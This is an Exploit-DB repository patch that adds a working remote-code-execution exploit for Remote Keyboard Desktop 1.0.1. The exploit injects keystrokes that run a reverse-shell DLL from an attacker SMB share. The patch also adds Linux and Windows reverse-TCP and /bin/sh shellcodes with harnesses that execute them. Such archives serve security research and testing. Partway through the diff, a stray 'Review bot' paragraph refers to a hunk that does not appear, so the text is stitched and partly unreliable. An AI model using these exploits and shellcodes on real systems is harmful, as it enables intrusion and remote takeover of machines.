 29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,remote,multiple,,2007-01-09,2013-11-04,1,CVE-2007-0183;OSVDB-32662,,,,,https://www.securityfocus.com/bid/21977/info
From 6d030b37a60c2264902be54e42b1015714b64265 Mon Sep 17 00:00:00 2001
From: Exploit-DB Date: Thu, 22 May 2025 00:16:30 +0000 Subject: [PATCH 3/6] DB: 2025-05-22 6 changes to exploits/shellcodes/ghdb Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) Linux/x86 - Reverse TCP Shellcode (95 bytes) Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) Windows 11 x64 - Reverse TCP Shellcode (564 bytes) --- exploits/windows/remote/52299.py | 132 ++++++++++++ files_exploits.csv | 1 + files_shellcodes.csv | 3 + shellcodes/linux_x86-64/52296.asm | 31 +++ shellcodes/linux_x86/52297.c | 43 ++++ shellcodes/windows_x86-64/52298.py | 335 +++++++++++++++++++++++++++++ 6 files changed, 545 insertions(+) create mode 100755 exploits/windows/remote/52299.py create mode 100644 shellcodes/linux_x86-64/52296.asm create mode 100644 shellcodes/linux_x86/52297.c create mode 100755 shellcodes/windows_x86-64/52298.py diff --git a/exploits/windows/remote/52299.py b/exploits/windows/remote/52299.py new file mode 100755 index 000000000..8efd8e22d --- /dev/null +++ b/exploits/windows/remote/52299.py 
@@ -0,0 +1,132 @@
+# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
+# Date: 05/17/2025
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://remotecontrolio.web.app/
+# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
+# Version: 1.0.1
+# Tested on: Windows 10 Pro Build 19045
+
+# Start Remote Keyboard Desktop on your windows
+# Preparing:
+#
+# 1. Generating payload (dll/exe):
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
+# 2. Start smb server: impacket-smbserver SHARE . -smb2support
+# 3. nc -lnvp 8080
+# 4. python exploit.py
+#####
+
+#!/usr/bin/env python3
+
+import websocket
+import json
+import time
+
+target = "192.168.8.105"
+lhost = "192.168.8.101"
+WS_URL = f"ws://{target}:8080/"
+payload = "shell2.dll" # payload dll/exe filename
+debug = False
+
+HEADER_LIST = [
+ "User-Agent: Dart/3.7 (dart:io)",
+ f"Origin: http://{target}:8080",
+ "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
+]
+
+#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based
+
+SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
+based
+
+special_mapping = {
+ ' ': ("SPACE", False),
+ '/': ("NUMPAD_DIVIDE", False),
+ '\\': ("\\", False),
+ '.': ("NUMPAD_DECIMAL", False),
+ ',': (",", False),
+}
+
+def send_key_event(ws, key, key_down):
+ event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
+key_down, "capsLock": False}}
+ ws.send(json.dumps(event))
+
+def send_text(ws, text, delay=0.05):
+ shift_pressed = False
+ for ch in text:
+ if ch in special_mapping:
+ key_name, need_shift = special_mapping[ch]
+ elif ch.isalpha():
+ need_shift = ch.isupper()
+ key_name = ch.upper()
+ elif ch.isdigit():
+ key_name = ch
+ need_shift = False
+ else:
+ raise ValueError(f"No key mapping for character: {ch!r}")
+
+ if need_shift and not shift_pressed:
+ send_key_event(ws, "SHIFT", True)
+ shift_pressed = True
+ elif not need_shift and shift_pressed:
+ send_key_event(ws, "SHIFT", False)
+ shift_pressed = False
+
+ send_key_event(ws, key_name, True)
+ send_key_event(ws, key_name, False)
+ time.sleep(delay)
+
+ if shift_pressed:
+ send_key_event(ws, "SHIFT", False)
+
+def send_key(ws, keys, delay=0.05):
+ for key in keys:
+ send_key_event(ws, key, True)
+ time.sleep(delay)
+ for key in reversed(keys):
+ send_key_event(ws, key, False)
+
+def on_open(ws):
+ print ("Let's start!")
+
+ send_key(ws, ["LEFT_WINDOWS", "R"])
+ time.sleep(0.5)
+
+ send_text(ws, SMB_PATH)
+ send_key(ws, ["RETURN"])
+ print ("Executing...")
+ time.sleep(1.2)
+
+ print("Check your listener!")
+ if debug:
+
+ print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
+")
+
+ ws.close()
+
+def on_message(ws, message):
+ if debug:
+ print("[=] Received:", message)
+
+def on_error(ws, error):
+ if debug:
+ print("[!] Error:", error)
+
+def on_close(ws, code, reason):
+ if debug:
+ print(f"[x] Closed: {code} - {reason}")
+
+if __name__ == "__main__":
+ websocket.enableTrace(debug)
+ ws = websocket.WebSocketApp(
+ WS_URL,
+ header=HEADER_LIST,
+ on_open=on_open,
+ on_message=on_message,
+ on_error=on_error,
+ on_close=on_close
+ )
+
+ ws.run_forever()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 592e4bab1..937480489 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -45357,6 +45357,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80,2014-09-15,2016-10-10,1,CVE-2014-6287;OSVDB-111386,,,http://www.exploit-db.com/screenshots/idlt35000/screen-shot-2014-10-28-at-91538-am.png,http://www.exploit-db.comhfs2.3_288.zip,
 39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",remote,windows,,2016-01-04,2016-05-09,1,CVE-2014-6287;OSVDB-111386,,,,http://www.exploit-db.comhfs2.3c.src.zip,
 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,,2021-02-26,2021-02-26,0,,,,,,
+52299,exploits/windows/remote/52299.py,"Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)",2025-05-21,"Chokri Hammedi",remote,windows,,2025-05-21,2025-05-21,0,,,,,,
 46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,,2019-04-15,2021-01-08,1,,Remote,,http://www.exploit-db.com/screenshots/idlt47000/image.png,http://www.exploit-db.comRemoteMouse.exe,
 1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow",2006-03-07,"securma massine",remote,windows,110,2006-03-06,,1,OSVDB-23735;CVE-2006-1124,,,,,
 16775,exploits/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,remote,windows,,2010-03-10,2016-09-27,1,CVE-2009-4006;OSVDB-59772,"Metasploit Framework (MSF)",,,,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 92132dd6a..31bb8753d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -630,6 +630,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",,linux_x86,422,2011-06-08,2018-01-17,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-770.php
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,,linux_x86,131,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-552.php
 13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes To /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,,linux_x86,508,2008-08-17,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-208.php
+52297,shellcodes/linux_x86/52297.c,"Linux/x86 - Reverse TCP Shellcode (95 bytes)",2025-05-21,"Al Baradi Joy",,linux_x86,95,2025-05-21,2025-05-21,0,,,,,,
 35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,,linux_x86,37,2014-12-30,2014-12-30,0,,,,,,
 43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(/tmp/willdeleted) Shellcode (41 bytes)",2010-05-31,gunslinger_,,linux_x86,41,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-633.php
 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,,linux_x86,380,2012-01-17,2017-08-24,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-799.php
@@ -820,6 +821,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",,linux_x86-64,31,2017-03-03,2017-08-24,0,,,,,,
 13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,,linux_x86-64,49,2009-05-13,2017-07-04,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-77.php
 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (168 bytes)",2019-07-29,"Pedro Cabral",,linux_x86-64,168,2019-07-29,2019-08-01,0,,,,,,
+52296,shellcodes/linux_x86-64/52296.asm,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes)",2025-05-21,"Sayan Ray",,linux_x86-64,36,2025-05-21,2025-05-21,0,,,,,,
 51258,shellcodes/linux_x86-64/51258.txt,"Linux/x86_64 - bash Shellcode with xor encoding",2023-04-05,"Jeenika Anadani",,linux_x86-64,71,2023-04-05,2023-04-05,0,,,,,,
 47290,shellcodes/linux_x86-64/47290.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (129 bytes)",2019-08-19,"Gonçalo Ribeiro",,linux_x86-64,129,2019-08-19,2019-08-20,0,,,,,,
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",,linux_x86-64,104,2019-06-10,2019-06-10,0,,,,,,
@@ -1039,6 +1041,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",2021-10-01,"Daniel Ortiz",,windows_x86,,2021-10-01,2021-10-29,0,,,,,,
 39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",,windows_x86,184,2016-06-07,2016-09-05,0,,,,,,
 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",,windows_x86,278,2010-07-09,2017-08-24,1,CVE-2010-0425,,,,,http://shell-storm.org/shellcode/files/shellcode-681.php
+52298,shellcodes/windows_x86-64/52298.py,"Windows 11 x64 - Reverse TCP Shellcode (564 bytes)",2025-05-21,"Victor Huerlimann",,windows_x86-64,564,2025-05-21,2025-05-21,0,,,,,,
 41827,shellcodes/windows_x86-64/41827.asm,"Windows/x64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",,windows_x86-64,45,2017-04-06,2017-04-06,0,,,,,,
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,,windows_x86-64,50,2018-08-29,2018-09-08,0,,,,,,
 37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",,windows_x86-64,59,2015-08-20,2015-08-20,0,,,,,,
diff --git a/shellcodes/linux_x86-64/52296.asm b/shellcodes/linux_x86-64/52296.asm
new file mode 100644
index 000000000..ba66da680
--- /dev/null
+++ b/shellcodes/linux_x86-64/52296.asm
@@ -0,0 +1,31 @@
+# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes)
+# Date: 2025-03-23
+# Exploit Author: Sayan Ray [@barebones90]
+# Tested on: Linux x86-64
+# CVE: N/A
+
+; P0P SH311 execve ("/bin/sh", NULL, NULL)
+
+GLOBAL _start
+
+section .text
+
+_start:
+ xor rax, rax
+ push rax
+
+ mov r10, 0x68732f6e69622f ; hs/nib/
+ push r10
+
+ mov rdi, rsp ; rdi points to the string "/bin/sh" from the stack
+ ; ( const char *pathname )
+
+ ; Calling execve
+ mov rax, 0x3b ; 59 [execve syscall]
+ mov rsi, 0 ; NULL ( char *const _Nullable argv[] )
+ mov rdx, 0 ; NULL ( char *const _Nullable envp[] )
+ syscall
+
+; Shellcode:
+; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05
+; [Length] : 36
\ No newline at end of file
diff --git a/shellcodes/linux_x86/52297.c b/shellcodes/linux_x86/52297.c
new file mode 100644
index 000000000..2b02b3a2b
--- /dev/null
+++ b/shellcodes/linux_x86/52297.c
@@ -0,0 +1,43 @@
+/*
+# Exploit Title: Linux/x86 - Reverse TCP Shellcode (95 bytes)
+# Date: 2025-04-06
+# Exploit Author: Al Baradi Joy
+# Platform: Linux x86
+# Type: Shellcode
+# Shellcode Length: 95 bytes
+# Tested On: Kali Linux x86
+# Connect-Back IP: 192.168.1.100
+# Connect-Back Port: 4444
+
+Description:
+This is a null-free reverse TCP shell shellcode for Linux x86 that connects back to 192.168.1.100:4444 and spawns a /bin/sh shell. Useful in remote code execution exploits for getting a remote shell.
+
+Usage:
+Start a netcat listener on your attacking machine:
+ nc -lvnp 4444
+
+Compile and run on the target machine:
+ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+ ./shellcode
+*/
+
+#include 
+#include 
+
+unsigned char shellcode[] =
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" // zero out registers
+"\x50\x6a\x01\x6a\x02\x89\xe1\xb0\x66" // socket syscall
+"\xcd\x80\x89\xc6\x31\xc0\x68\xc0\xa8\x01\x64" // push IP: 192.168.1.100
+"\x66\x68\x11\x5c" // push port 4444
+"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56"
+"\x89\xe1\xb0\x66\xb3\x03\xcd\x80" // connect
+"\x31\xc9\xb1\x02\x89\xf3\xb0\x3f" // dup2 loop
+"\xcd\x80\x49\x79\xf9"
+"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
+"\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"; // execve("/bin/sh")
+
+int main() {
+ printf("Shellcode Length: %zu\n", strlen(shellcode));
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86-64/52298.py b/shellcodes/windows_x86-64/52298.py
new file mode 100755
index 000000000..2c89e85bb
--- /dev/null
+++ b/shellcodes/windows_x86-64/52298.py
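Review bot: The two `#include` directives in the harness are empty as reproduced here (`+#include` twice), so the header names that `printf` and `strlen` need (presumably `<stdio.h>` and `<string.h>`) are missing and the listing as committed does not compile; the `CylonLicence.cpp` excerpt in the `52306.txt` hunk later in this page shows the same empty `#include` lines. The length report `printf("Shellcode Length: %zu\n", strlen(shellcode));` is only correct because the payload is null-free, as the header claims; `sizeof shellcode - 1` states the length without depending on that property, which matters when the comment and the bytes are maintained separately. The header documents the hard-coded connect-back endpoint (192.168.1.100:4444) and the inline comments `// push IP: 192.168.1.100` and `// push port 4444` tie it to the byte string, which is the right level of documentation for a reader cataloguing the sample; keeping those two comments adjacent to the bytes they describe is worth preserving.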
@@ -0,0 +1,335 @@ +#!/usr/bin/python +# +# Description: Windows 11 x64 Reverse TCP Shell +# Architecture: x64 +# OS: Microsoft Windows +# Author: hvictor (Victor Huerlimann) +# Shellcode Size: 564 bytes +# Repository:https://github.com/hvictor/shellcode-x64 +# +# Special thanks to wetw0rk (Milton Valencia), from whom I drew inspiration for the indicated parts of the code: https://github.com/wetw0rk/Sickle +# +# Note: You will have to modify the line 193 of this file according to the attacker's IP and port: +# mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2] +# The high DWORD is the IPv4 address in little-endian, followed by the 2-bytes port in little-endian, and the 2-bytes address family. + +import ctypes, struct +from ctypes import wintypes + +from keystone import * +CODE = ( +''' +start: + mov rbp, rsp + sub rsp, 1600 + +resolve_kernel32: + mov dl, 0x4b # dl = 'K' + mov rcx, 0x60 # + mov r8, gs:[rcx] # R8 = address of PEB + mov rdi, [r8 + 0x18] # RDI = address of _PEB_LDR_DATA + mov rdi, [rdi + 0x30] # RDI = address of InInitializationOrderModuleList (first _LIST_ENTRY) +search: + xor rcx, rcx + mov rbx, [rdi + 0x10] # RBX = DllBase + mov rsi, [rdi + 0x40] # RSI = address of UNICODE string BaseDllName.Buffer + mov rdi, [rdi] # RDI = address of the next _LIST_ENTRY + cmp [rsi + 0x18], cx # Compare the 24-th UNICODE char with NULL + jne search # If length of BaseDllName is not 12 UNICODE chars, continue searching + cmp [rsi], dl # Compare the first UNICODE char with 'K' + jne search # If the first UNICODE char is not 'K', continue searching + +find_function_jmp: + jmp callback # Jump to callback to make a negative (null byte free) call to get_find_function_addr + +get_find_function_addr: + pop rsi # The address of find_function is popped in RSI + mov [rbp + 0x8], rsi # The address of find_function is stored at (RBP + 8) + jmp resolve_k32_sym # Once the address of find_function has been stored, proceed with the resolution 
of kernel32 symbols + +callback: + call get_find_function_addr # When this call is done, the address of the 1st instruction find_function (add rsp, 8) is pushed to the stack + # This is the address of find_function, and it will be popped in ESI (see get_find_function_addr). + +find_function: + +# Current Stack Layout: +#--------------------------------------------------------------------------- +# QWORD: Return Address (addr of instruction after "call find_function", see below) +# QWORD: Number of hash bytes + 8 <- RSP +# QWORD: <0x00000000> +# QWORD: <0x00000000> +# ... +# QWORD: 0x0000000000000000 +#--------------------------------------------------------------------------- + + add rsp, 8 # Point RSP to (Number of hash bytes + 8) + pop rax # RAX = Number of hash bytes + 8 + push -1 # Write -1 on the stack instead of (Number of hash bytes + 8) + add rsp, rax # Add (Number of hash bytes + 8) to RSP: it now points to 0x0000000000000000 + +# Current Stack Layout: +#--------------------------------------------------------------------------- +# QWORD: Return Address +# QWORD: 0xffffffffffffffff +# QWORD: <0x00000000> +# QWORD: <0x00000000> +# ... 
+# QWORD: 0x0000000000000000 <- RSP +#--------------------------------------------------------------------------- + +find_function_loop2: + xor rax, rax + xor rdi, rdi + mov eax, [rbx + 0x3c] # EAX = offset to the PE Header of the module = e_lfanew + mov edi, [rbx + rax + 0x88] # EDI = RVA of the Export Directory Table of the module (1st field: VirtualAddress) + add rdi, rbx # RDI = VMA of the Export Directory Table of the module + mov ecx, [rdi + 24] # ECX = NumberOfNames (field of the Export Directory Table of the module) + mov eax, [rdi + 32] # EAX = RVA of AddressOfNames (array of Name Addresses, field of the Export Directory Table) + add rax, rbx # EAX = VMA of AddressOfNames + mov [rbp - 8], rax # Save the VMA of AddressOfNames at (EBP - 8): this location is never touched for anything else + +find_function_loop: + dec ecx # Initially, ECX = NumberOfNames: decrement to get the index of the last name + mov rax, [rbp - 8] # EAX = VMA of AddressOfNames + mov esi, [rax + rcx * 4] # ESI = RVA of the current Symbol Name + add rsi, rbx # RSI = VMA of the current Symbol Name + +compute_hash: + xor rax, rax # EAX = 0 + cdq # If the MSB of EAX = 1: EDX = 0x11111111 + # If the MSB of EAX = 0: EDX = 0x00000000 -> fills EDX with the sign of EAX + # In this case, EDX = 0x00000000 because EAX = 0x00000000 + +compute_hash_repeat: + ror edx, 0xd # Right-shift EDX of 13 bits + add edx, eax # EDX += current EAX value + lodsb # Load the byte pointed by ESI into AL + test al, al # Test if the NULL terminator of the Symbol Name has been reached + jnz compute_hash_repeat # If the NULL terminator has been reached (ZF = 1), proceed to hash comparison + # Else, perform the next iteration of the hash-computation algorithm + # At this point, EDX contains the computed hash of the current symbol + +find_function_compare: + cmp edx, [rsp - 8] # Compare the computed hash with the hash of the wanted symbol + jnz find_function_loop # If ZF = 0, the hash is different: proceed with the next name 
from AddressOfNames + # If ZF = 1, the hash is equal: symbol found: continue hereby + mov edx, [rdi + 36] # EDX = RVA of the AddressOfNameOrdinals array + add rdx, rbx # RDX = VMA of the AddressOfNameOrdinals array + mov cx, [rdx + 2 * rcx] # CX = Symbol's Ordinal (lower 16 bits of ECX) + mov edx, [rdi + 28] # EDX = RVA of the AddressOfFunctions array + add rdx, rbx # RDX = VMA of the AddressOfFunctions array + mov eax, [rdx + 4 * rcx] # EAX = AddressOfFunctions[ordinal] = RVA of the wanted symbol + add rax, rbx # EAX = VMA of the wanted symbol + push rax # Push the wanted symbol's VMA onto the stack: + # ATTENTION: The symbol's VMA overwrites its Hash on the stack! + mov rax, [rsp - 8] + cmp rax, -1 # If *(RSP - 8) is -1: ZF = 1: all wanted symbols have been resolved + jnz find_function_loop2 # Until all wanted symbols have been resolved, continue looping + +find_function_finish: # When we get here, all wanted symbols have been resolved: their VMAs are on the stack + sub rsp, 16 # Point RSP to the Return Address of find_function + ret # Return + +resolve_k32_sym: + mov rax, 0x00000000ec0e4e8e # Hash of LoadLibraryA + push rax + mov rax, 0x0000000016b3fe72 # Hash of CreateProcessA + push rax + mov rax, 0x0000000078b5b983 # Hash of TerminateProcess + push rax + mov rax, 32 # Push 32 onto the stack + push rax + call [rbp + 8] # Call to find_function (see find_function above) + +load_ws2_32: + mov rax, 0x0000000000006C6C # 'll x00 x00 x00 x00 x00 x00' (reversed) + push rax + mov rax, 0x642E32335F327377 # 'ws2_32.d' (reversed) + push rax + mov rcx, rsp # Paramter 1 = address of "ws2_32.dll" + sub rsp, 40 # Create 40 bytes of room on the stack + call [rsp + 80] # Call LoadLibraryA + nop + +resolve_ws2_sym: + mov rbx, rax # RBX = Base Address of ws2_32.dll + mov rax, 0x0000000060aaf9ec # Hash of connect + push rax + mov rax, 0x00000000adf509d9 # Hash of WSASocketA + push rax + mov rax, 0x000000003bfcedcb # Hash of WSAStartup + push rax + mov rax, 32 + push rax # Push 32 
(Number of Hashes pushed + 8) + call [rbp + 8] # Call find_function + + sub rsp, 512 + +call_WSAStartup: + mov rcx, 0x202 # RCX = WinSock Version 2.2 + lea rdx, [rsp + 800] # RDX = Address of output WSAData structure + call [rsp + 520] # Call WSAStartup + +call_WSASocketA: + mov rcx, 2 # Parameter af = 2 (AF_INET) + mov rdx, 1 # Parameter type = 1 + mov r8, 6 # Parameter protocol = 6 (TCP) + xor r9, r9 # Parameter lpProtocolInfo = 0 + mov [rsp + 32], r9 # Parameter dwFlags = 0 + mov [rsp + 40], r9 # Parameter g = 0 + call [rsp + 528] # Call WSASocketA + + +call_connect: + mov rsi, rax # Save socket fd in RSI + mov rcx, rax # RCX = Parameter s = socket fd created with WSSocketA + mov r8, 16 # R8 = Parameter namelen = 16 + + # Preparation of the sockaddr_in structure on the stack: + # struct sockaddr_in { + # QWORD: [sin_addr (4 bytes) | sin_port (2 bytes) | sin_family (2 bytes)] + # QWORD: sin_zero = [00000000 00000000] + # } + mov r9, 0x7901A8C029230002 # R9 = [IP = 192.168.1.121 | port = 0x2329 = 9001 | AF_INET = 2] + lea rdx, [rsp + 800] # RDX = Parameter name = Address of struct sockaddr_in + mov [rdx], r9 # Write fields: sin_addr, sin_port, sin_family + xor r9, r9 + mov [rdx + 8], r9 # Write field sin_zero + call [rsp + 536] # Call connect + +# Thanks to wetw0rk (Milton Valencia) for his setup_STARTUPINFOA implementation: +# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py +create_STARTUPINFOA: + lea rdi, [rsp + 800] + add rdi, 0x300 + mov rbx, rdi + xor eax, eax + mov ecx, 0x20 + rep stosd # Zero-out 0x80 bytes + mov eax, 0x68 # EAX = sizeof(_STARTUPINFO) = 0x68 + mov [rbx], eax # Field lpStartInfo.cb = sizeof(_STARTUPINFO) + mov eax, 0x100 # EAX = STARTF_USESTDHANDLES + mov [rbx + 0x3c], eax # Field lpStartupInfo.dwFlags = STARTF_USESTDHANDLES + mov [rbx + 0x50], rsi # Field lpStartupInfo.hStdInput = socket fd + mov [rbx + 0x58], rsi # Field lpStartupInfo.hStdOutput = socket fd + mov [rbx + 0x60], rsi # Field 
lpStartupInfo.hStdError = socket fd + +# Thanks to wetw0rk (Milton Valencia) for his call_CreateProcessA implementation: +# https://github.com/wetw0rk/Sickle/blob/master/src/sickle/payloads/windows/x64/shell_reverse_tcp.py +call_CreateProccessA: + xor rax, rax + xor rcx, rcx # Parameter lpApplicationName = 0 + lea rdx, [rsp + 800] # Parameter lpCommandLine + add rdx, 0x180 + mov eax, 0x646d63 # EAX = "cmd" + mov [rdx], rax # Write "cmd" in the lpCommandLine parameter + xor r8, r8 # Parameter lpProcessAttributes = 0 + xor r9, r9 # Parameter lpThreadAttributes = 0 + xor rax, rax + inc eax + mov [rsp + 0x20], rax # Parameter bInheritHandles = 1 + dec eax + mov [rsp + 0x28], rax # Parameter dwCreationFlags = 0 + mov [rsp + 0x30], rax # Parameter lpEnvironment = 0 + mov [rsp + 0x38], rax # Parameter lpCurrentDirectory = 0 + mov [rsp + 0x40], rbx # Parameter lpStartupInfo = address of _STARTUPINFO + add rbx, 0x68 + mov [rsp + 0x48], rbx # Parameter lpProcessInformation = output address, right after _STARTUPINFO + call [rsp + 616] + +call_TerminateProcess: + xor rcx, rcx + dec rcx # Parameter hProcess = -1 = this process + xor rdx, rdx # Parameter uExitCode = 0 (graceful termination) + int3 + call [rsp + 608] # Call TerminateProcess +''' +) + + +# Initialize engine in 64-bit mode +ks = Ks(KS_ARCH_X86, KS_MODE_64) +encoding, count = ks.asm(CODE) +instructions = "" +for dec in encoding: + instructions += "\\x{0:02x}".format(int(dec)).rstrip("\n") + +print("Opcodes = (\"" + instructions + "\")") +print(f"Size: {len(encoding)} bytes.") + +# E + +# Preparation of WSAStartup (not included in the shellcode) +# Define necessary structures and constants +class WSADATA(ctypes.Structure): + _fields_ = [ + ("wVersion", wintypes.WORD), + ("wHighVersion", wintypes.WORD), + ("szDescription", wintypes.CHAR * 257), + ("szSystemStatus", wintypes.CHAR * 129), + ("iMaxSockets", wintypes.UINT), + ("iMaxUdpDg", wintypes.UINT), + ("lpVendorInfo", ctypes.POINTER(ctypes.c_char)) + ] + +# Load the 
Winsock library +ws2_32 = ctypes.windll.ws2_32 + +# Define the WSAStartup function prototype +# WSAStartup takes two arguments: +# 1. A WORD containing the version of Winsock requested (e.g., 0x0202 for Winsock 2.2) +# 2. A pointer to a WSADATA structure that receives the details of the Winsock implementation +ws2_32.WSAStartup.argtypes = [wintypes.WORD, ctypes.POINTER(WSADATA)] +ws2_32.WSAStartup.restype = wintypes.INT + +def call_wsastartup(): + # Request version 2.2 (0x0202) + version_requested = 0x0202 + + # Create an instance of WSADATA to hold the output + wsadata = WSADATA() + + # Call WSAStartup + result = ws2_32.WSAStartup(version_requested, ctypes.byref(wsadata)) + + if result != 0: + raise RuntimeError(f"WSAStartup failed with error code {result}") + + print(f"WSAStartup succeeded. Winsock version: {wsadata.wVersion >> 8}.{wsadata.wVersion & 0xFF}") + return wsadata + +call_wsastartup() + +sh = b"" +for e in encoding: + sh += struct.pack("B", e) +shellcode = bytearray(sh) + +# Alloco memoria eseguibile per lo shellcode +ptr = ctypes.windll.kernel32.VirtualAlloc(0x10000000, + ctypes.c_int(len(shellcode)), + ctypes.c_int(0x3000), + ctypes.c_int(0x40)) + +# Metto lo shellcode nel buffer `buf` +buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) + +# Copio lo shellcode nella memoria allocata +ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), + buf, + ctypes.c_int(len(shellcode))) + +print("Shellcode: Short Reverse Shell") +print("Shellcode address = %s" % hex(ptr)) +input("\n[?] Press Enter to execute the shellcode: ") + +# Eseguo lo shellcode in un nuovo thread, su cui faccio la join +ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), + ctypes.c_int(0), + ctypes.c_int(ptr), + ctypes.c_int(0), + ctypes.c_int(0), + ctypes.pointer(ctypes.c_int(0))) + +ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1)) \ No newline at end of file From d69eaacef80e5091a4524d76233f7841067029c7 Mon Sep 17 00:00:00 2001 
